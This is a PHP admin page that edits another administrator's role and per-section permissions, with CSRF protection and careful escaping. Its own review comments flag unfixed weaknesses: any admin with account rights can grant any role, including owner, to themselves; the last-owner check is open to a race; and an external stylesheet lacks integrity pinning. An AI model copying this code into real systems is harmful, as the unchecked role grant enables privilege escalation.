Viewing: admin_permissions.php
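<?php
/**
 * Admin permission editor.
 *
 * Lets an administrator holding the 'admin_accounts' permission change the
 * base role of another admin (selected with ?id=) and optionally replace the
 * role defaults with a hand-picked permission list.
 *
 * Security-relevant behaviour of this page:
 *  - requires an authenticated admin session and the 'admin_accounts' permission;
 *  - every state change needs a per-session CSRF token, because this form
 *    rewrites privileges and must not be triggerable from a third-party page;
 *  - refuses to demote the last remaining 'owner';
 *  - all dynamic values are escaped for the context they are written into
 *    (HTML attribute, HTML text, inline JSON).
 *
 * NOTE(review): nothing here restricts WHICH role the acting admin may grant.
 * Anyone with 'admin_accounts' can assign any role normalizeAdminRole() accepts,
 * including to their own account. If 'owner' is meant to be grantable only by
 * owners, that rule has to be enforced here or in the role helpers.
 */
include '../components/connect.php';
require_once '../components/admin_roles.php';

session_start();

$admin_id = $_SESSION['admin_id'] ?? null;
if (!$admin_id) {
    header('location:admin_login.php');
    exit();
}

ensureAdminRolesSchema($conn);
$currentRole = getRoleBySession($conn);
if (!adminHasPermission($currentRole, 'admin_accounts')) {
    enforceAdminPermission('admin_accounts');
    // Fail closed: the helper is defined in another file, so do not rely on it
    // terminating the request. Without this exit an unauthorized admin would
    // fall through to the update logic below.
    exit();
}

// Per-session anti-CSRF token, created on first visit and checked on every POST.
if (empty($_SESSION['admin_permissions_csrf']) || !is_string($_SESSION['admin_permissions_csrf'])) {
    $_SESSION['admin_permissions_csrf'] = bin2hex(random_bytes(32));
}
$csrfToken = $_SESSION['admin_permissions_csrf'];

$roleLabels = getAvailableAdminRoles();
$permissionLabels = getAdminPermissionLabels();
$rolePermissionMatrix = getAdminRolePermissions();

$targetId = isset($_GET['id']) ? (int)$_GET['id'] : 0;
if ($targetId <= 0) {
    addAdminFlashMessage('Selecciona un usuario válido para actualizar.');
    header('location:admin_accounts.php');
    exit();
}

$targetStmt = $conn->prepare('SELECT id, name, role FROM `admin` WHERE id = ? LIMIT 1');
$targetStmt->execute([$targetId]);
$targetAdmin = $targetStmt->fetch(PDO::FETCH_ASSOC);
if (!$targetAdmin) {
    addAdminFlashMessage('El usuario seleccionado no existe.');
    header('location:admin_accounts.php');
    exit();
}

$currentTargetRole = normalizeAdminRole($targetAdmin['role'] ?? null);
[$storedCustomPermissions, $storedCustomMode] = getAdminCustomPermissionsFromDb($conn, $targetId);

// Values used to render the form; overwritten with the submission on POST so a
// rejected request redisplays what the user entered.
$formRole = $currentTargetRole;
$formCustomMode = $storedCustomMode;
$formPermissions = $formCustomMode ? $storedCustomPermissions : ($rolePermissionMatrix[$formRole] ?? []);
$allPermissions = array_keys($permissionLabels);
$errors = [];

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Reject forged or stale submissions before looking at anything else.
    $postedToken = $_POST['csrf_token'] ?? '';
    if (!is_string($postedToken) || !hash_equals($csrfToken, $postedToken)) {
        $errors[] = 'Solicitud no válida. Recarga la página e inténtalo de nuevo.';
    }

    // A client can send arrays where scalars are expected (role[]=x) and the
    // reverse; coerce to the expected shape before handing values to helpers.
    $postedRole = $_POST['role'] ?? $formRole;
    if (!is_string($postedRole)) {
        $postedRole = $formRole;
    }
    $postedPermissions = $_POST['permissions'] ?? [];
    if (!is_array($postedPermissions)) {
        $postedPermissions = [];
    }

    // presumably normalizeAdminRole() maps unknown values to a safe default - confirm
    $submittedRole = normalizeAdminRole($postedRole);
    $submittedCustomMode = isset($_POST['custom_mode']) && $_POST['custom_mode'] === '1';
    $submittedPermissions = $submittedCustomMode ? normalizeAdminPermissionList($postedPermissions) : null;

    $formRole = $submittedRole;
    $formCustomMode = $submittedCustomMode;
    $formPermissions = $formCustomMode ? $submittedPermissions : ($rolePermissionMatrix[$formRole] ?? []);

    // NOTE(review): this count and the UPDATE below are separate statements, so
    // two concurrent demotions could both pass the check. Consider doing both
    // inside one transaction if the helpers allow it.
    $isLastOwner = $currentTargetRole === 'owner'
        && $submittedRole !== 'owner'
        && countAdminsByRole($conn, 'owner') <= 1;
    if ($isLastOwner) {
        $errors[] = 'No puedes remover el último Propietario del sistema.';
    }

    if ($formCustomMode && empty($formPermissions)) {
        $errors[] = 'Selecciona al menos una sección cuando activas los permisos personalizados.';
    }

    if (empty($errors)) {
        if ($submittedRole !== $currentTargetRole) {
            $updateRoleStmt = $conn->prepare('UPDATE `admin` SET role = ? WHERE id = ?');
            $updateRoleStmt->execute([$submittedRole, $targetId]);
            $currentTargetRole = $submittedRole;
        }

        // Passing null clears the custom list so the account inherits its role defaults.
        saveAdminCustomPermissions($conn, $targetId, $formCustomMode ? $formPermissions : null);

        // When admins edit their own account, reload the access data cached in the session.
        if ($targetId === (int)$admin_id) {
            refreshAdminAccess($conn, $targetId);
        }

        addAdminFlashMessage('Permisos actualizados correctamente.');
        header('location:admin_accounts.php');
        exit();
    }
}

// Role => default-permission map for the inline script. Encoded once with the
// JSON_HEX_* flags so no value can close the <script> element or a JS string.
$roleDefaultsJson = json_encode(
    (object) array_map('array_values', $rolePermissionMatrix),
    JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
) ?: '{}';
?>
<!DOCTYPE html>
<html lang="es">
<head>
   <meta charset="UTF-8">
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Configuración de permisos</title>
   <link rel="icon" href="../images/favicon.png" type="image/x-icon">
   <?php // NOTE(review): third-party stylesheet loaded on an admin page without Subresource Integrity; pin it with integrity/crossorigin or self-host it. ?>
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css">
   <link rel="stylesheet" href="../css/admin_style.css">
   <style>
      body.permissions-page { background: linear-gradient(135deg, #f5f9ff 0%, #fff7f3 100%); min-height: 100vh; }
      .permissions-page .form-container { padding: 2.5rem 1.5rem 3.5rem; max-width: 920px; margin: 0 auto; }
      .permissions-page .form-card { background: #fff; border-radius: 16px; padding: 2.25rem 2.5rem; box-shadow: 0 18px 42px rgba(17, 24, 39, 0.12); border: 1px solid rgba(226, 232, 240, 0.75); }
      .permissions-page .form-card h3 { margin-bottom: 1.5rem; font-size: 1.65rem; color: #1f2937; font-weight: 700; }
      .permissions-page .form-field { margin-bottom: 1.6rem; }
      .permissions-page .form-field label { display: block; font-weight: 600; margin-bottom: .55rem; color: #1e293b; }
      .permissions-page select.box, .permissions-page input.box, .permissions-page .box.inline { width: 100%; padding: .8rem .95rem; border-radius: .85rem; border: 1px solid #cbd5f5; font-size: 1rem; transition: border-color .2s ease, box-shadow .2s ease; }
      .permissions-page select.box:focus, .permissions-page input.box:focus { border-color: #ff7a45; box-shadow: 0 0 0 3px rgba(255, 122, 69, 0.18); }
      .permissions-page .custom-toggle { display: flex; align-items: center; gap: .75rem; background: #f8fafc; padding: 1rem 1.15rem; border-radius: .85rem; border: 1px solid #e2e8f0; }
      .permissions-page .custom-toggle input { width: 20px; height: 20px; }
      .permissions-page .permissions-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(240px, 1fr)); gap: .85rem; margin-top: 1rem; }
      .permissions-page .permission-item { border: 1px solid #e2e8f0; border-radius: .85rem; padding: .95rem 1.05rem; display: flex; align-items: center; gap: .75rem; background: linear-gradient(145deg, #ffffff, #f8fafc); transition: border-color .2s ease, box-shadow .2s ease; }
      .permissions-page .permission-item input[type="checkbox"] { width: 18px; height: 18px; }
      .permissions-page .permission-item.disabled { opacity: .55; }
      .permissions-page .permission-item:not(.disabled):hover { border-color: #ffb38a; box-shadow: 0 12px 25px rgba(255, 124, 67, 0.16); }
      .permissions-page .note { margin-top: 1rem; font-size: .96rem; color: #64748b; line-height: 1.45; }
      .permissions-page .flex-btn { display: flex; flex-wrap: wrap; gap: .85rem; margin-top: 2.2rem; justify-content: flex-end; }
      .permissions-page .flex-btn .btn, .permissions-page .flex-btn .option-btn { min-width: 160px; text-align: center; }
      .permissions-page .error-box { background: #fef2f2; border: 1px solid #fca5a5; color: #b91c1c; padding: 1rem 1.2rem; border-radius: .85rem; margin-bottom: 1.6rem; }
      @media (max-width: 900px) {
         .permissions-page .form-container { padding: 2rem 1.25rem 3rem; }
         .permissions-page .form-card { padding: 2rem 1.75rem; }
      }
      @media (max-width: 720px) {
         .permissions-page .form-card { padding: 1.75rem 1.5rem; }
         .permissions-page .permissions-grid { grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); }
         .permissions-page .custom-toggle { flex-direction: column; align-items: flex-start; gap: .55rem; }
         .permissions-page .flex-btn { justify-content: center; }
      }
      @media (max-width: 540px) {
         .permissions-page .form-container { padding: 1.5rem 1rem 2.5rem; }
         .permissions-page .form-card { padding: 1.5rem 1.2rem; }
         .permissions-page .form-card h3 { font-size: 1.45rem; }
         .permissions-page .permissions-grid { grid-template-columns: minmax(0, 1fr); }
         .permissions-page .permission-item { padding: .85rem .95rem; }
         .permissions-page .flex-btn { flex-direction: column-reverse; align-items: stretch; }
         .permissions-page .flex-btn .btn, .permissions-page .flex-btn .option-btn { width: 100%; min-width: 0; }
      }
   </style>
</head>
<body class="permissions-page">

<?php include '../components/admin_header.php'; ?>

<section class="form-container">
   <div class="form-card">
      <h3>Permisos de <?= htmlspecialchars((string) $targetAdmin['name'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></h3>

      <?php if (!empty($errors)): ?>
         <div class="error-box">
            <ul>
               <?php foreach ($errors as $error): ?>
                  <li><?= htmlspecialchars($error, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></li>
               <?php endforeach; ?>
            </ul>
         </div>
      <?php endif; ?>

      <form action="" method="POST" class="permission-form">
         <input type="hidden" name="csrf_token" value="<?= htmlspecialchars($csrfToken, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>">

         <div class="form-field">
            <label for="role">Rol base</label>
            <select name="role" id="role" class="box">
               <?php foreach ($roleLabels as $roleKey => $roleLabel): ?>
                  <option value="<?= htmlspecialchars((string) $roleKey, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>" <?= $formRole === $roleKey ? 'selected' : ''; ?>><?= htmlspecialchars($roleLabel, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></option>
               <?php endforeach; ?>
            </select>
         </div>

         <div class="form-field">
            <label class="custom-toggle" for="custom-mode">
               <input type="checkbox" name="custom_mode" id="custom-mode" value="1" <?= $formCustomMode ? 'checked' : ''; ?>>
               <span>Activar selección manual de secciones</span>
            </label>
         </div>

         <div class="form-field">
            <label>Secciones disponibles</label>
            <div class="permissions-grid" id="permissions-grid" data-enabled="<?= $formCustomMode ? '1' : '0'; ?>">
               <?php
               $basePermissions = $rolePermissionMatrix[$formRole] ?? [];
               foreach ($allPermissions as $permissionKey):
                  $isSelected = in_array($permissionKey, $formPermissions, true);
                  $isDefault = in_array($permissionKey, $basePermissions, true);
                  // Escape once; the key is written into two attributes below.
                  $permissionAttr = htmlspecialchars((string) $permissionKey, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
               ?>
                  <label class="permission-item <?= $formCustomMode ? '' : 'disabled'; ?>" data-permission="<?= $permissionAttr; ?>">
                     <input type="checkbox" name="permissions[]" value="<?= $permissionAttr; ?>" <?= $isSelected ? 'checked' : ''; ?> <?= $formCustomMode ? '' : 'disabled'; ?> data-default="<?= $isDefault ? '1' : '0'; ?>">
                     <span><?= htmlspecialchars($permissionLabels[$permissionKey], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></span>
                  </label>
               <?php endforeach; ?>
            </div>
            <p class="note">Cuando la selección manual está desactivada el usuario heredará los permisos del rol base.</p>
         </div>

         <div class="flex-btn">
            <a href="admin_accounts.php" class="option-btn">Cancelar</a>
            <button type="submit" class="btn">Guardar cambios</button>
         </div>
      </form>
   </div>
</section>

<script>
   // UI convenience only: the server re-validates role and permissions on POST,
   // so nothing here is a security control.
   const customToggle = document.getElementById('custom-mode');
   const permissionsGrid = document.getElementById('permissions-grid');
   const permissionInputs = permissionsGrid ? permissionsGrid.querySelectorAll('input[type="checkbox"]') : [];
   const roleSelect = document.getElementById('role');
   const roleDefaults = <?= $roleDefaultsJson; ?>;

   // Enable or disable the checkboxes to match the "manual selection" toggle;
   // when disabled, show the defaults of the selected role instead.
   function updatePermissionState() {
      if (!customToggle || !permissionsGrid) {
         return;
      }
      const enabled = customToggle.checked;
      permissionsGrid.dataset.enabled = enabled ? '1' : '0';
      permissionsGrid.querySelectorAll('.permission-item').forEach((item) => {
         item.classList.toggle('disabled', !enabled);
      });
      permissionInputs.forEach((input) => {
         input.disabled = !enabled;
         if (!enabled) {
            input.checked = input.dataset.default === '1';
         }
      });
   }

   // Recompute each checkbox's default flag after the base role changes.
   function syncDefaultPermissionsFromRole() {
      if (!customToggle || !roleSelect || customToggle.checked) {
         return;
      }
      const selectedRole = roleSelect.value;
      // Own-property lookup so a value such as "constructor" cannot resolve to
      // something inherited from Object.prototype.
      const defaultList = Object.prototype.hasOwnProperty.call(roleDefaults, selectedRole)
         ? roleDefaults[selectedRole]
         : [];
      permissionInputs.forEach((input) => {
         input.dataset.default = defaultList.includes(input.value) ? '1' : '0';
         input.checked = input.dataset.default === '1';
      });
   }

   if (customToggle && permissionsGrid) {
      customToggle.addEventListener('change', () => {
         updatePermissionState();
      });
   }

   if (roleSelect) {
      roleSelect.addEventListener('change', () => {
         syncDefaultPermissionsFromRole();
         updatePermissionState();
      });
   }

   updatePermissionState();
</script>

</body>
</html>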